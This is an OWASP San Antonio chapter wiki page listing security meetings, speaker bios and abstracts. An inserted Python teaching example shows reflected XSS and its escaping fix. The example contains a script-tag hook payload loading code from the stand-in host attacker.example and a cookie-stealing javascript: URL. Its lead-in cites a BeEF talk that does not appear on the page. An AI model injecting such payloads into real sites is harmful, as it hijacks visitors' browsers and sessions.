The presentation will cover background information on cross-site scripting (XSS) attacks as well as real-world examples of what can happen when this type of vulnerability is present and the different ways that it can be exploited. The presentation will also include language-agnostic ways to mitigate this sort of risk and how developers and security professionals can identify these risks.

Presenter Bio:

David is currently a Security Architect for Rackspace IT Hosting. In this role, David is responsible for designing and implementing network security solutions, as well as software development in support of automation. In previous roles he was a software developer on various projects written in a mix of PHP, Python, Perl, Ruby, C#, and ASP.NET. Prior to Rackspace, David worked for Digital Defense, and he holds a B.B.A. in Information Systems from the University of Texas San Antonio. He also has an extensive background in application security and is actively researching botnet mitigation techniques.

Certifications held include CISSP, RHCE, and CCNA.


'''San Antonio OWASP Chapter: January 2009 Meeting'''

Topic: "Vulnerability Management in an Application Security World."

Presenter: Dan Cornell, Principal, Denim Group

Date: January 29, 2009 11:30am – 1:00pm

Location:

San Antonio Technology Center (Web Room)
3463 Magic Drive
San Antonio, TX 78229

http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229

Abstract: Identifying application-level vulnerabilities via penetration tests and code reviews is only the first step in actually addressing the underlying risk. Managing vulnerabilities for applications is more challenging than dealing with traditional infrastructure-level vulnerabilities because they typically require the coordination of security teams with application development teams and require security managers to secure time from developers during already-cramped development and release schedules. In addition, fixes require changes to custom application code and application-specific business logic rather than the patches and configuration changes that are often sufficient to address infrastructure-level vulnerabilities.

This presentation details many of the pitfalls organizations encounter while trying to manage application-level vulnerabilities as well as outlining strategies security teams can use for communicating with development teams. Similarities and differences between security teams' practice of vulnerability management and development teams' practice of defect management will be addressed in order to facilitate healthy communication between these groups.

Presenter Bio:

Dan Cornell has over ten years of experience architecting, developing and securing web-based software systems. As a Principal of Denim Group, he leads the organization's technology team, overseeing methodology development and project execution for Denim Group's customers. He also heads the Denim Group application security research team, investigating the application of secure coding and development techniques to the improvement of web-based software development methodologies. He is also the primary author of sprajax, Denim Group's open source tool for assessing the security of AJAX-enabled web applications.

----

'''Previous News'''

The slide deck from the OWASP San Antonio June 2010 meeting is available online here: http://www.owasp.org/images/2/24/OWASPSanAntonio06162010_DDFA_PresentationFinal.pdf

The slide deck from the OWASP San Antonio May 2010 meeting is available online here: http://www.owasp.org/images/b/b9/OpenSAMM10_OWASPSanAntonio_20100519.pdf

The slide deck from the OWASP San Antonio March 2010 meeting is available online here: http://www.owasp.org/index.php?title=File:Protecting_the_Enterprise_-_Software_Backdoors.pptx&oldid=80140#filelinks

The slide deck from the OWASP San Antonio January 2010 meeting is available online here: http://www.owasp.org/index.php/File:San_Antonio_Chapter-OWASP_WTE_Jan-2010.pdf#filelinks

The slide deck from the OWASP San Antonio October 2008 meeting is available online here: http://www.owasp.org/index.php/San_Antonio

The slide deck from the OWASP San Antonio September 2007 meeting is available online here: [[Image:fortify-bjenkins-AppSecStrategy-20070906.pdf]]

The slide deck from the OWASP San Antonio March 2007 meeting will be available online shortly.

The slide deck from the OWASP San Antonio September 2006 meeting is available online here: [[Image:OWASPSanAntonio_2006_09_AgileAndSecure.pdf]]

The slide deck from the OWASP San Antonio August 2006 meeting is available online here: [[Image:OWASPSanAntonio_2006_08_SingleSignOn.ppt]]

The slide deck from the OWASP San Antonio June 2006 meeting is available online here: [[Image:OWASPSanAntonio_2006_06_Crypto_Content.pdf]]

The slide deck from the OWASP San Antonio May 2006 meeting is available online here: [[Image:OWASPSanAntonio_2006_05_ForcefulBrowsing_Content.pdf]]

The slide deck from the OWASP San Antonio September 2004 meeting is available online here: [[Image:OWASPSanAntonio_20040922.pdf]]
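The February 2015 BeEF talk and the June 2009 cross-site scripting talk above turn on the same point: once a script tag is reflected into a page, the attacker's hook runs in every victim's browser. The following Python is an added example, not code from either talk or from BeEF. It renders a reflected parameter the vulnerable way and with context-aware escaping, using a constructed hook-style payload (the hostname attacker.example and the hook.js path are made up for the example).

```python
"""Reflected XSS: the unescaped rendering an attacker hooks, next to a
context-aware escaping fix. Added example, not from either talk.
The payload is a constructed stand-in for a BeEF hook injection
(a script tag pointing at the attacker's hook script); hostname is made up.
"""
import html
from urllib.parse import urlsplit

# Constructed attacker input: what someone running BeEF would inject into a
# reflected parameter so that every browser rendering the page gets hooked.
HOOK_PAYLOAD = '<script src="http://attacker.example/hook.js"></script>'


def render_greeting_vulnerable(name):
    """Echoes user input straight into the HTML body: classic reflected XSS."""
    return "<p>Hello, " + name + "</p>"


def render_greeting_fixed(name):
    """HTML body context: entity-encode <, >, &, and both quote characters."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_link_vulnerable(url):
    """URL attribute context done wrong: no escaping, any scheme accepted."""
    return '<a href="' + url + '">profile</a>'


def safe_url(url):
    """Allow only http(s) URLs; javascript:, data: and friends are rejected.
    urlsplit() normalises the scheme, so ' JaVaScRiPt:' is caught too."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def render_link_fixed(url):
    """URL attribute context: validate the scheme, then attribute-escape."""
    return '<a href="' + html.escape(safe_url(url), quote=True) + '">profile</a>'


def contains_active_content(markup):
    """Crude detector, used only to make the two renderings comparable:
    does the output still carry an unescaped tag, handler or javascript: URL?"""
    lowered = markup.lower()
    return ("<script" in lowered or " onerror=" in lowered
            or 'href="javascript:' in lowered)


if __name__ == "__main__":
    js_url = "javascript:alert(document.cookie)"   # constructed attacker URL
    for label, out in (
        ("vulnerable body", render_greeting_vulnerable(HOOK_PAYLOAD)),
        ("escaped body", render_greeting_fixed(HOOK_PAYLOAD)),
        ("vulnerable link", render_link_vulnerable(js_url)),
        ("validated link", render_link_fixed(js_url)),
    ):
        print(f"{label:16} hooked={contains_active_content(out)}  {out}")
```

The fix is per context: entity encoding is right for the HTML body and for quoted attribute values, but a URL attribute also needs a scheme allow-list, since a `javascript:` URL needs no angle brackets at all. The detector function is there only to make the two outputs comparable; it is not a substitute for a real scanner or for a Content Security Policy that blocks the attacker's script origin.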
 
  
== Past Events ==
https://www.owasp.org/index.php/San_Antonio/pastEvents

[[Category:OWASP Chapter]]
[[Category:United States]]
[[Category:Texas]]

Latest revision as of 12:35, 29 October 2018

OWASP San Antonio

Welcome to the San Antonio chapter homepage. The chapter leadership team is:

Dan Cornell, Matt Valdes, Michael Xin


Participation

OWASP Foundation (Overview Slides) is a professional association of global members and is open to anyone interested in learning more about software security. Local chapters are run independently and guided by the Chapter Leader Handbook. As a 501(c)(3) non-profit professional association, your support and sponsorship of any meeting venue and/or refreshments is tax-deductible. Financial contributions should only be made online using the authorized online chapter donation button. To be a SPEAKER at ANY OWASP Chapter in the world, simply review the speaker agreement and then contact the local chapter leader with details of what OWASP PROJECT, independent research or related software security topic you would like to present on.

Sponsorship/Membership

Donate to this chapter or become a local chapter supporter. Or consider the value of Individual, Corporate, or Academic Supporter membership. Ready to become a member? Join Now


Local News

Please see https://www.meetup.com/OWASP-San-Antonio/ for the most up to date chapter meeting schedule 

OWASP San Antonio - November 9, 2018 @ 11:30am

Join us for the November 2018 OWASP San Antonio meeting!

We will have an interesting talk covering strategies and benefits of application tracing!

Title:

Tracing your system for fun and profit

Abstract:

How many of us go in every day knowing the ins and outs of our application but not fully understanding how it interacts within the greater system flow? How often do we get called up at night by a frantic developer three dependencies away from our application yelling about a response that they did not expect due to a bug fix we put in a few weeks earlier? As developers, that happens more often than we care to admit. Having something that shows an entire system workflow is monumental. On top of that, security professionals would also benefit from understanding how different parts of the system interact with each other.

There have been many ways to solve this problem (design documents, architecture designs, workflow system documents, etc.) but most uses require manual updates and dedicated resources that know the entire system flow to understand what to update. This is not (usually) scalable.

Tracing cross-boundary systems looks to help solve these issues. In this talk we'll look at one way of tracing a system end-to-end (OpenTracing), the benefits to security professionals, implementation details, other competing products in this space, and next steps in the ecosystem. The goal is for attendees to leave with a rudimentary understanding of system tracing and its potential benefits and drawbacks.

Speaker: Dimitry Ushakov

Bio:

Dimitry Ushakov is a Quality Engineer at Rackspace. When not dealing with impostor syndrome from working with geniuses every day, he works on making operators' and developers' lives easier with test automation, continuous integration/delivery management, and other testing industry buzzwords.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

OWASP San Antonio - October 5, 2018 @ 11:30am

Join us for the October 2018 OWASP San Antonio meeting where we will have a talk covering the latest in DDoS attack tools and services!

Title:

Weapons of Mass Disruption

Abstract:

We now live in a world where individuals or groups of individuals hold the same destructive power that only nation states once held. For as little as a couple of dollars an hour, fortune 500 companies and even nation states have been wiped off the Internet. The emergence of professional DDoS services is changing the threat landscape of the Internet once again. We'll take a look at DDoS tools and services and what we can do to combat them.

Speaker: Roman Lara

Bio:

Roman Lara is a Senior Engineer on Rackspace's specialized DDoS Team and has been a Racker in various roles since 2009. He is responsible for driving the design, build, and maintenance of Rackspace's DDoS Mitigation infrastructure and services. Roman is a high-energy, hands-on leader whose knowledge and experience of threat trends help develop and create powerful mitigation strategies through Fanatical Support. He earned a degree in Business from the University of Texas at San Antonio.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

The slide link: https://www.slideshare.net/michaelxin2015/weapons-of-mass-disruption-by-roman-lara-for-owasp-san-antonio-chapter-meetup

OWASP San Antonio - June 29, 2018 @ 11:30am

Join us for the June 2018 OWASP San Antonio meeting where we will have a talk covering how to evaluate threats to IoT devices and their related systems!

Title:

Threat Modeling for IoT Systems

Abstract:

The Internet of Things (IoT) is an exciting and emerging area of technology allowing individuals and businesses to make radical changes to how they live their lives and conduct commerce. The challenge with this trend is that IoT devices are just computers with sensors running applications. Because IoT devices interact with our personal lives the proliferation of these devices exposes an unprecedented amount of personal sensitive data to significant risk. In addition, IoT security is not only about the code running on the device. These IoT devices are connected to systems that include supporting web services as well as other client applications that allow for management and reporting.

A critical step to understanding the security of any system is building a threat model. This helps to enumerate the components of the system as well as the paths that data takes as it flows through the system. Combining this information with an understanding of trust boundaries provides system designers with critical information to mitigate systemic risks to the technology and architecture. This presentation looks at how Threat Modeling can be applied to IoT systems to help build more secure systems during the design process, as well as how to use Threat Modeling when testing the security of IoT systems.

Speaker: Dan Cornell

Bio:

A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

OWASP San Antonio - March 30, 2018 @ 11:30am

Join us for the March 2018 OWASP San Antonio meeting!

We will have a talk covering methods and techniques used when attacking authentication in web apps.

Title:

Attacking Authentication in Web Applications

Abstract:

Broken authentication is an ongoing issue, identified in the OWASP Top 10 2013 and 2017 (A2 in both). While broken authentication can span multiple topics, this presentation focuses mainly on attacking single-factor authentication using usernames and passwords. Methods and techniques will be discussed to perform reconnaissance, username enumeration, account lockout bypass, and various password attacks against web applications.

Speaker: Jake Miller

Bio:

Jake is a penetration tester for Blue Canopy (Jacobs Engineering Group), primarily focusing on web application security. Prior to penetration testing, he was a Security Controls Assessor, a SOC analyst, and a Navy Submariner. He blogs about security on https://laconicwolf.com, writes a fair amount of Python and PowerShell code on https://github.com/laconicwolf, and occasionally tweets (@laconicwolf). Aside from security and coding, he enjoys spending time with his family and participating in ultra-running and obstacle races.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

OWASP San Antonio - February 23, 2018 @ 11:30am

Join us for the February 2018 OWASP San Antonio meeting!

We will have a talk covering the complexities of secrets management and how one enterprise met the challenge.

Title: HashiCorp Vault in the Enterprise

Abstract:

As established enterprises move to embrace automation, securing the secrets that are required for applications to run presents challenges. How can automation be introduced to legacy application deployment models? What capabilities are needed to support modern application architectures? This presentation will review some of the discoveries made while researching these challenges from an enterprise perspective and describe at a high level how HashiCorp Vault can be a way to address them.

Speaker: Mike Thurmond

Bio:

Mike Thurmond is an Information Security Architect at H-E-B. Mike has 15+ years of experience developing, deploying and managing security tools and practices in large enterprises. His experience includes developing and managing authentication systems, developing customized security services, developing and running compliance programs, and integrating security into an agile development SDLC.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

OWASP San Antonio - January 26, 2018 @ 11:30am

Join us for the January 2018 OWASP San Antonio meeting!

We will have a great talk about heap-related attacks and prevention methods.

Speaker: Tongping Liu

Bio:

Tongping Liu is an Assistant Professor at the University of Texas at San Antonio. He received his Ph.D. from the University of Massachusetts Amherst in 2014. His research spans runtime systems, operating systems, programming languages, compilers, and distributed systems. His primary research goal is to practically improve the performance, reliability and security of parallel software. His work has appeared in the most prestigious systems conferences, such as SOSP, OSDI, EuroSys, and CCS. He has been awarded a 2015 Google Faculty Research Award and a Mozilla Research Grant.

Title:

FreeGuard: A Faster Secure Heap Allocator

Abstract:

In spite of years of improvements to software security, heap-related attacks still remain a severe threat. One reason is that many existing memory allocators fall short in a variety of aspects. For instance, performance-oriented allocators are designed with very limited countermeasures against attacks, but secure allocators generally suffer from significant performance overhead, e.g., running up to 10x slower.

This talk will introduce FreeGuard, a secure memory allocator that prevents or reduces a wide range of heap-related security attacks, such as heap overflows, heap over-reads, use-after-frees, as well as double and invalid frees. FreeGuard has similar performance to the default Linux allocator, with less than 2% overhead on average, but provides significant improvement to security guarantees.

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

OWASP San Antonio - November 17, 2017 @ 11:30am

Join us for the November 2017 OWASP San Antonio meeting!

We will have a great talk about optimizing AppSec programs with instrumentation and sensors.

Speaker: Girish Nair

Bio: Girish Nair has been a software developer for more than two decades. He has a special interest in web-related technologies and application security. He has a Master’s degree in computer science, and is a CISSP. He currently works for Contrast Security, where he evangelizes their technology.

Title: Using Instrumentation and Sensors to drive Optimization in your Application Security Program

Abstract: In our physical world, we have instrumentation all around us. Clocks tell us time, kitchen ovens tell us temperature, cars tell us speed and fuel level, and even have onboard health diagnostics. At our homes, we have security alerts when someone trespasses on our property or opens a door. However, in the world of software, we have very little visibility into what is going on inside the software. Our presenters will describe how instrumentation can be used to enable your software applications to both detect vulnerabilities and block attacks. Furthermore, they will demonstrate the insights offered by using instrumentation and why this approach can offer unique insights to your security program.

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

OWASP San Antonio - October 27, 2017 @ 11:30am

Join us for the October 2017 OWASP San Antonio meeting!

We will have a talk about DNS Exfiltration Techniques and Methods.

Speaker: Nolan Berry

Bio: Nolan has been working at Rackspace for close to 5 years focusing on Linux and has a strong passion for security. He is on the DNS Engineering team and has spoken at various conferences and venues about DNS exfiltration and botnet control structures.

Title: DNS Exfiltration Techniques and Methods

Abstract: This presentation will show various methods of DNS exfiltration to move data out of networks and into networks with varying levels of detectability and talk about why DNS presents a monitoring and security issue to modern systems engineers looking to secure their infrastructure. We will discuss how to detect, but also how to execute this from a red team.

@Denim Group 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

OWASP San Antonio - September 29, 2017 @ 11:30am

Join us for the September 2017 OWASP San Antonio meeting!

We will have a talk about how billion dollar enterprises manage application security at scale.

Speaker: Brandon Triance-Haldane

Bio: Brandon Triance-Haldane is a Solution Architect at Security Compass; he has been delivering high quality solutions to his clients for more than six years. Brandon holds a bachelor's degree in English literature as well as an advanced diploma in Computer Security & Investigations. In his spare time, Brandon likes making music, writing code, and following the Toronto Blue Jays.

Title: How Billion Dollar Enterprises Manage Application Security at Scale

Abstract: Security Compass recently completed a comprehensive research study by surveying companies across multiple industries with the goal of discovering how large, complex organizations address application security at scale. The majority of respondents surveyed were multinational organizations who reported annual earnings greater than $1 billion USD. Through this new research study, we have gleaned novel insights on how large organizations manage application security at scale. Through this presentation, we will reveal aggregated insights, industry trends, and best practices that illuminate how organizations are addressing application security at scale, so that you may apply and compare these learnings to the state of application security at your own organization.

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232


OWASP San Antonio - August 25, 2017 @ 11:30am

Join us for the August 2017 OWASP San Antonio meeting!

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

We will have a talk about Serverless Security!

Speaker: Geva Solomonovich, COO Snyk

Title: Serverless Security: What’s Left To Protect?

Abstract: Serverless means handing off server management to the cloud platforms – along with their security risks. With the “pros” ensuring our servers are patched, what’s left for application owners to protect? As it turns out, quite a lot. This talk discusses the aspects of security serverless doesn’t solve, the problems it could make worse, and the tools and practices you can use to keep yourself safe.


OWASP San Antonio - July 21, 2017 @ 11:30am

Join us for the July 2017 OWASP San Antonio meeting!

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

We will have a talk comparing the internet to the US Interstate System, and what this means to the future of information security.

Speaker: Damon Small

Bio: Damon Small began his career studying music at Louisiana State University. Pursuing the changing job market, he took advantage of computer skills learned in the LSU recording studio to become a systems administrator in the mid-1990s. Over the past 16 years as a security professional he has supported InfoSec initiatives in the healthcare, defense, aerospace, and oil and gas industries. In addition to his Bachelor of Arts in Music, Damon completed the Master of Science in Information Assurance degree from Norwich University in 2005. His role as Technical Director includes working closely with NCC Group consultants and clients in delivering complex security assessments that meet varied business requirements.

Title: Connections: Eisenhower and the Internet

Abstract: The speaker researches the history of one large, government-funded infrastructure and compares it to another: specifically, the Eisenhower Interstate System and the Internet. "Connections: Eisenhower and the Internet" explores what the logistical challenges of moving vehicles across the country can teach us about cybersecurity. Although these two topics seem unrelated, the speaker will take the audience on a journey that begins with early 20th century road-building projects, travels through ARPANET and the commercialization of the Internet, and arrives at current-day cyberspace. These two massive infrastructures have changed the world, and there are important lessons that the former can teach about the latter. The presentation concludes with predictions about the future of the Information Superhighway and how information security professionals can prepare.


OWASP San Antonio - June 30, 2017 @ 11:30am

Join us for the June 2017 OWASP San Antonio meeting!

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

We will have a talk about testing infrastructure code.

Speaker: Dimitry Ushakov

Bio: Dimitry Ushakov is a Quality Engineer at Rackspace. When not dealing with impostor syndrome from working with geniuses every day, he works on making operators' and developers' lives easier with test automation, continuous integration/delivery management, and other testing industry buzzwords.

Title: Testing Infrastructure Code

Abstract: Whether you subscribe to TDD or like to write all your tests after all the development's complete, we can all agree that testing application code is a great idea. While we do a very good job of validating that our application works, we rarely give as much love to our infrastructure code. Infrastructure testing allows us to validate that the hardware, software dependencies, and system configurations will work when deploying to a target environment without an actual need for deployment (most of the time).

In this talk, we'll define what we mean by infrastructure as code and infrastructure testing. We'll use the ecosystem of one of the major players in this area, Chef, to take a look at the tooling available to properly unit test, statically analyze, integration test, and compliance/security test our infrastructure.

In the second part of the talk, we'll work through a demo application, applying that tooling to build a true CI/CD pipeline.


OWASP San Antonio - May 26, 2017 @ 11:30am

Join us for the May 2017 OWASP San Antonio meeting!

Denim Group 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

We will have a talk about adding security to your software procurement process.

Speaker: Kevin Dunn

Bio: Kevin Dunn is Senior Vice President for Consultancy for NCC Group. Kevin has been a professional security consultant for over 15 years, working on diverse projects and challenging technologies for the world’s largest and most demanding companies. His current responsibilities include delivering security consultancy while managing a talented, highly technical team of pentesters. Kevin works closely with Fortune 100 companies, covering the Oil & Gas, Finance and Software sectors, developing strategic security assessment and advisory services for NCC Group brands from his office base of operations in Austin, TX. Over his career, he has worked on many physical penetration tests, site audits, and design or implementation projects for physical security.

Title: It Was Broken When It Got Here! Security in your Software Procurement Process

Abstract: In 2017, Software Security is reasonably well understood. Thanks to the hard work of organizations like MITRE, OWASP, BSIMM, Microsoft, OpenSAMM and others, we have moved to a much better software security landscape when compared to 10+ years ago. Of course vulnerabilities still exist, and are found with regularity, but these are typically addressed quickly and competently by the big software vendors. For example, a new critical vulnerability in Windows will be fixed by Microsoft and patched efficiently in most enterprises in a matter of days to weeks. Most recently, Google managed to fix an OAUTH vuln being exploited in a mass-phishing exercise in a matter of hours! But what about everything else you install in your company or use as a service? Not all product vendors have the same level of understanding or approach to security, and not all software is under the constant scrutiny of an operating system or widespread authentication mechanism.

As organizations we buy and install lots of third party software, ranging from desktop applications through to entire platforms or appliances. Who is checking that software is free of simple vulnerabilities? This issue of security for Commercial Off-The-Shelf (COTS) software, or Free and Open Source Software (FOSS), is often a complicated one. In this talk, we'll look at some case studies of vulnerabilities found during penetration tests that were then used to forge compromises of companies. In each case, the flaws discovered and exploited had been within the products for a significant amount of time, providing a potential backdoor into the company's internal network or data.

The session will culminate in advice and guidance for how to ensure that security is not an after-thought when purchasing new enterprise products for your company.


OWASP San Antonio - January 27, 2017 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the January 2017 OWASP San Antonio meeting!


We will have a talk about integrating Security into DevOps pipelines through the use of attack surface monitoring.


Speakers: Dan Cornell


Bios: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.


Title: Monitoring Application Attack Surface to Integrate Security into DevOps Pipelines


Abstract: A web application’s attack surface is the combination of URLs it will respond to as well as the inputs to those URLs that can change the behavior of the application. Understanding an application’s attack surface is critical to being able to provide sufficient security test coverage, and by watching an application’s attack surface change over time security and development teams can help target and optimize testing activities.

This presentation looks at methods of calculating web application attack surface and tracking the evolution of attack surface over time. In addition, it looks at metrics and thresholds that can be used to craft policies for integrating different testing activities into Continuous Integration / Continuous Delivery (CI/CD) pipelines for teams integrating security into their DevOps practices.


https://www.meetup.com/OWASP-San-Antonio/events/236883708/


OWASP San Antonio - August 26, 2016 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the June OWASP San Antonio meeting!


We will have a talk about Automated DNS Data Exfiltration and Mitigation.


Speakers: Nolan Berry, Towne Besel, Cory Schwartz


Bios: Nolan Berry is a Linux Systems Engineer on the Network Operations DNS Infrastructure team at Rackspace.

Towne Besel is a Security Engineer on the Network Operations DDoS Team at Rackspace.

Cory Schwartz is a Linux Operations Engineer on the Rackspace Cloud Storage Team.


Title: Automated DNS Data Exfiltration and Mitigation


Abstract: Come and learn about DNS based data exfiltration and see it in action. We will show you how a few simple scripts we wrote can steal data from a secure network almost without detection using obfuscated DNS lookups. We will cover the concepts, perform a live demo, and show you how to detect this type of malicious activity.

http://www.meetup.com/OWASP-San-Antonio/events/233427790/


OWASP San Antonio - June 23, 2016 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the June OWASP San Antonio meeting!


Note: New date is Thursday, June 23.


We will have a talk about source-assisted web application penetration testing.


Speaker: Dan Cornell


Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.


Title: The ABCs of Source-Assisted Web Application Penetration Testing With OWASP ZAP: Attack Surface, Backdoors, and Configuration


Abstract: There are a number of reasons to use source code to assist in web application penetration testing such as making better use of penetration testers’ time, providing penetration testers with deeper insight into system behavior, and highlighting specific sections of code so development teams can remediate vulnerabilities faster. Examples of these are provided using the open source ThreadFix plugin for the OWASP ZAP proxy and dynamic application security testing tool. These show opportunities attendees have to enhance their own penetration tests given access to source code.

This presentation covers the “ABCs” of source code assisted web application penetration testing: covering issues of attack surface enumeration, backdoor identification, and configuration issue discovery. Having access to the source lets an attacker enumerate all of the URLs and parameters an application exposes – essentially its attack surface. Knowing these allows pen testers greater application coverage during testing. In addition, access to source code can help to identify potential backdoors that have been intentionally added to the system. Comparing the results of blind spidering to a full attack surface model can identify items of interest such as hidden admin consoles or secret backdoor parameters. Finally, the presentation examines how access to source code can help identify configuration settings that may have an adverse impact on the security of the deployed application.


http://www.meetup.com/OWASP-San-Antonio/events/231594503/


OWASP San Antonio - May 20, 2016 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the May OWASP San Antonio meeting!


Note: New date is Friday, May 20 to avoid Memorial Day conflicts.


We will have a talk about Runtime Application Self-Protection (RASP).


Speaker: Kunal Anand

Bio: Kunal is the co-founder and CTO of Prevoty, a next-generation application security platform. Prior to that, he was the Director of Technology at the BBC Worldwide, overseeing engineering and operations across the company’s global Digital Entertainment and Gaming initiatives. Kunal also has several years of experience leading security, data and engineering at Gravity, MySpace and NASA’s Jet Propulsion Laboratory. His work has been featured in Wired Magazine and Fast Company. He continues to develop the patented security technologies that power Prevoty’s core products. Kunal received a B.S. from Babson College.

Title: Runtime Application Self-Protection (RASP) Tools

Abstract: Kunal will be discussing Runtime Application Self-Protection (RASP) and a new high-performance methodology called language theoretic security (LANGSEC). Kunal will also break down how lexers, tokenizers and parsers work, and construct an open source toolchain to analyze data and explore interactive data visualizations -- covering the challenges of modern AppSec along the way.

http://www.meetup.com/OWASP-San-Antonio/events/231044053/


OWASP San Antonio - April 29, 2016 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the April OWASP San Antonio meeting! We will have a talk about AppSec Pipelines!


Speaker: Matt Tesauro

Bio: Matt Tesauro is a founder and CTO of Infinitiv, a Senior Software Security Engineer at Pearson and was previously the Senior Product Security Engineer at Rackspace. He is also an Adjunct Professor for the University of Texas Computer Science department, teaching the next generation of CS students about Application Security. Matt is a broadly experienced information security professional with 15 years specializing in application and cloud security. He has also presented and provided trainings at various international industry events including the DHS Software Assurance Workshop, OpenStack Summit, SANS AppSec Summit, and AppSec US, EU and LATAM. His work has included security consulting, penetration testing, threat modeling, code reviews, training and teaching at the University of Texas and Texas A&M University. He is a former board member of the OWASP Foundation and project lead for the OWASP AppSec Pipeline & WTE projects. WTE is a collection of application security testing tools. He holds two degrees from Texas A&M University and several security and Linux certifications.

Title: Taking AppSec to 11: AppSec Pipelines, DevOps and Making Things Better

Abstract: How many applications are in your company’s portfolio? What’s the headcount for your AppSec team? Whatever your situation is, I am sure the numbers are not in your favor. It's not time to find a new career, it's time to up your game. This talk will cover how to take your small merry band of AppSec professionals and scale it up to a virtual army. By taking the best of DevOps, Agile and CI/CD, you can iteratively up your AppSec game over time and begin your ascent out of the security hole you are in.

The talk covers real world experiences running AppSec groups at two different companies: Rackspace, with approximately 4,000+ employees, and Pearson, with 40,000+. Both have an international presence and far more apps and developers than AppSec staff. The talk covers the key principles to speed and scale up AppSec programs using an AppSec Pipeline as well as practical examples of these practices put into use. Start early and begin to buy down the technical security debt which feels inevitable with more traditional AppSec program thinking.


OWASP San Antonio - March 25 @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the March OWASP San Antonio meeting! We will have a talk about giving tech talks!


Speaker: Major Hayden


Bio: Major Hayden started at Rackspace in 2006 as a Linux support technician. Over the years, he has worked in support, software development, operations, and information security roles. Major currently works with the OpenStack Private Cloud team with a focus on operations and information security. He blogs frequently on major.io and has been known to use Twitter from time to time.

Title: Taming the Technical Talk

Abstract: Many technical people inevitably find themselves up against the most terrifying challenge of their careers: giving a technical talk. Talking in front of large groups of people is never easy, but it can transform the future of software projects or the careers of individuals. This nerve-wracking career catalyst can be tamed, however, through careful planning and thoughtful delivery.

During this talk, we will embark on a journey to overcome our fears and deliver high quality technical talks to small or large groups. We will cover everything from the early stages, such as choosing a topic, all the way to the day of the talk itself.

http://www.meetup.com/OWASP-San-Antonio/events/228893612/


OWASP San Antonio - February 26 @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the February OWASP San Antonio meeting! We will have a talk about Automated API testing!


Speaker: Matt Valdes


Bio: Matt Valdes is a Security Developer in Test on the Security and Quality Engineering team at Rackspace. Throughout his career, he has been involved in all aspects of the SDLC and is passionate about security testing, process engineering and automation.


Title: Automating Security Tests for APIs


Abstract: RESTful APIs are an increasingly common attack vector for applications. Despite this ever-present threat, open source and commercial vendor support for automatic API security scanners remains limited. With the rate at which APIs are developed, enhanced and deployed, this lack of security test automation creates a gap that at its best limits adoption, and at its worst may leave an application open to attack. To fill the gap in security testing efficiency, members of the Rackspace Quality Engineering and Security Engineering teams worked together to create an Open Source, automated API security scanner.

Syntribos is a flexible, automated scanner that provides configurable test coverage for any HTTP API. Learn how Syntribos enables you to test HTTP APIs in an automated way, helping to detect and eliminate common security vulnerabilities such as SQL injection, command injection, denial of service attacks, and more.

https://github.com/openstack/syntribos


OWASP San Antonio - January 29 @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the first OWASP San Antonio meeting of 2016! We will have a talk about XPath Attacks!


Speaker: Luis Torres


Bio: Luis Torres is a security consultant with VerSprite. An avid pen tester, researcher, CTF participant, and bug bounty winner - Luis is a key consultant for VerSprite's AppSec Consulting practice where he focuses his time on client-server, cloud, web services, and fat client security testing. His recent research has been around more damaging exploits around XPath injection which he seeks to share with you today.


Title: XPath Awakens - Attacks & Impact Around XPath Injection


Abstract: XPath is a language that has been designed and developed to operate on data that is described with XML. XPath injection allows an attacker to inject XPath elements into a query that operates on XML. Threat agents often aim to circumvent authentication and/or access information in an unauthorized manner.


Developers today use XPath to perform actions over XML-based documents; however, insecure coding practices could allow injection issues to surface in web applications. Blind XPath Injection retrieves information by making true/false interrogations of web applications; however, these techniques mostly focus on retrieving current query information, skipping sensitive information in XML nodes outside of the current query. This presentation will extend beyond these blind injection attacks and discuss how to retrieve the entire XML document using Blind XPath Injection techniques.


OWASP San Antonio - September 18 @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


